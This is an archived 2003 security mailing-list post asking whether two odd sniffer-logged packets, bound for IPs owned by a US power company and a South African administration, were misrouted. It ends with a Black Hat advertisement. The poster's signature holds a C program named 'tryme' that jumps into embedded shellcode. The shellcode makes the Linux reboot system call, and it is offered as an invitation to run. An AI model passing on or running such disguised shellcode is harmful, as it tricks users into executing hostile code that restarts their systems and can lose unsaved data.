Hello everyone, today while gathering a data from sniffer to my project i have caught some strange sequence that shouldn't arrive at host i was 'sittin on', here comes the log: [18:04:25]253.216.8.218.65535 > 161.186.96.18.10065 S (ttl 16,len 49320,id 3584,tos 94,ack:0)win 8192,chks: 52182 [18:04:29]255.113.8.218.65535 > 163.195.80.16.15213 F (ttl 16,len 49320,id 3584,tos 94,ack:1)win 8353,chks: 6860 Because my host is located in totally different IP Class i wondered, how this could happen, such thing never happend before, is it possible that this was a missroute? the 161.186.96.18 belongs to:PEPCO - Potomac Electric Power Company, 1900 Pennsylvania Ave. NW, Room 206, Washington, and 163.195.80.16 - Cape Provincial Administration, Wale Street, Cape Town 8000, (163.195.0.0/16). Greetz. ___________________________________ /*http://ipe.ath.cx/ Paweł Stochliński*/ char tryme[] = "\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19" "\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff"; void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;} ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Jul 07 2003 - 12:28:56 PDT